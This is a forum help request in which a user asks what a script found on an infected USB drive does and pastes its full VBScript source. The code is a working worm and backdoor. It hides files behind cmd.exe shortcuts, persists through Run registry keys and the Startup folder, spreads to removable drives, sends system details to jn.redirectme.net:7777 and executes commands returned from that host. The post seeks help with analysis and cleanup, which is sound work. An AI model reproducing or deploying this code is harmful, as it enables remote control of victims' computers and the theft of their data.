Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

What does this 'virus'/script does?


  • Please log in to reply

#1
kmlkz

kmlkz

    New Member

  • Member
  • Pip
  • 1 posts
I work for a school magazine and one of the teachers got her usb flash drive infected from the printing room's computers. I checked her flash drive and all of the files inside has been turned into a working shortcut but the files are actually hidden (still there just folder hidden). The shortcut's target was window's cmd and will start the file and the script/virus itself every time the shortcut is opened. It appears only the flash drive is infected not her laptop. There's a folder hidden script (.vbs) inside the pendrive:

'<[ coded bY njq8 ]>'
On Error Resume Next
dim sh ' shell
set sh =WScript.CreateObject("WScript.Shell")
dim fs ' filesystem
set fs= CreateObject("Scripting.FileSystemObject") 
dim host
host="jn.redirectme.net"
dim port
port=7777
dim DR
DR = sh.ExpandEnvironmentStrings("%temp%") & "\"
dim FN
FN ="Servieca.vbs"
dim fh
dim us
us="~"
ins
dim spl
spl="jnJnj"
dim i
i=0
while true
dim a 
a= split(post("ready",""),spl)
select case a(0)
case "exc"
dim sa
sa= a(1)
execute sa
case "uns"
uns
end select
wscript.sleep 4000
i = i + 1
if i> 2 then
i=0
xins
end if
wend

function ins
on error resume next
us= sh.regread("HKCU\njq8")
if us="~" then
if lcase( mid(wscript.scriptfullname,2))=":\" & lcase(fn) then
us="y"
sh.regwrite "HKCU\njq8", us, "REG_SZ"
else
us="n"
sh.regwrite "HKCU\njq8", us, "REG_SZ"
end if
end if
Err.Clear
fs.CopyFile wscript.scriptfullname,dr & fn ,true
set fh = fs.OpenTextFile( dr & fn, 8, false)
if Err.Number>0 then
wscript.quit
end if
xins
end function

sub xins
on error resume next
sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
fs.copyfile wscript.scriptfullname, CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
if xx.drivetype=1 then
if fs.fileexists(xx.path & "\" & fn) then
fs.getfile(xx.path & "\" & fn).Attributes=0
end if
fs.copyfile dr & fn , xx.path & "\" & fn,true
For Each x In fs.GetFolder( xx.path & "\" ).Files
wscript.sleep 1
if instr(x.name,".") then
if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
x.Attributes = 2
if ucase(x.name) <> ucase(fn) then
With sh.CreateShortcut(xx.path & "\" & x.name & ".lnk") 
.TargetPath = "cmd.exe"
.WorkingDirectory = ""
.Arguments = "/c start " & Replace(fn," ", ChrW(34) _
& " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
.IconLocation = sh.regread("HKLM\SOFTWARE\Classes\" & sh.regread("HKLM\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
if instr( .iconlocation,",")=0 then
.iconlocation = .iconlocation &",0"
end if
.Save()
end with
end if
end if
end if
Next
end if
end if
end if
next
Err.Clear
end sub

function uns
on error resume next
fh.close
sh.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn
sh.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn
fs.DeleteFile dr & fn ,true
fs.DeleteFile CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
For Each x In fs.GetFolder( xx.path & "\").Files
On Error Resume Next
if instr(x.name,".") then
if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
x.Attributes = 0
if ucase(x.name) <> ucase(fn) then
fs.deletefile(xx.path & "\" & x.name & ".lnk" )
else
fs.deletefile( xx.path & "\" & x.name )
end if
end if
end if
Next
end if
end if
next
wscript.quit
end function

function post(cmd ,da)
post=""
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "POST","http://" & host & ":" & port &"/" & cmd, false
o.setRequestHeader "User-Agent:", inf
o.send da
post=o.responseText
end function

dim xinf
function inf
on error resume next
if xinf="" then
dim s
s="??"
s = hwd
inf = inf & s & "\"
s="??"
s= sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
inf = inf & s & "\"
s="??"
s= sh.ExpandEnvironmentStrings("%USERNAME%")
inf = inf & s & "\"
s="??"
Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set aa = a.ExecQuery ("Select * from Win32_OperatingSystem")
For Each aaa in aa
s= aaa.Caption 
exit for
Next
inf = inf & s & "\\0.3\" & us &"\" & pid 
xinf=inf
else
inf=xinf
end if
end function

function HWD
HWD="CH_??"
On Error Resume Next
Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set aa = a.ExecQuery("SELECT * FROM Win32_LogicalDisk")
For Each aaa In aa
if aaa.VolumeSerialNumber<>"" then
HWD= "CH_" & aaa.VolumeSerialNumber
exit for
end if
Next
end function

Function PID
PID=0
on error resume next
PID = GetObject("winmgmts:root\cimv2").Get("Win32_" &_
"Process.Handle='" & _
sh.Exec("mshta.exe").ProcessID & "'").ParentProcessId
End Function

i terminated wscript and removed the script from /temp and startup.. but i'm not sure what the opening of the port and most of the script does :| (also malware bytes returned nothing)

Edited by kmlkz, 04 December 2012 - 05:33 PM.

  • 0

Advertisements







Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP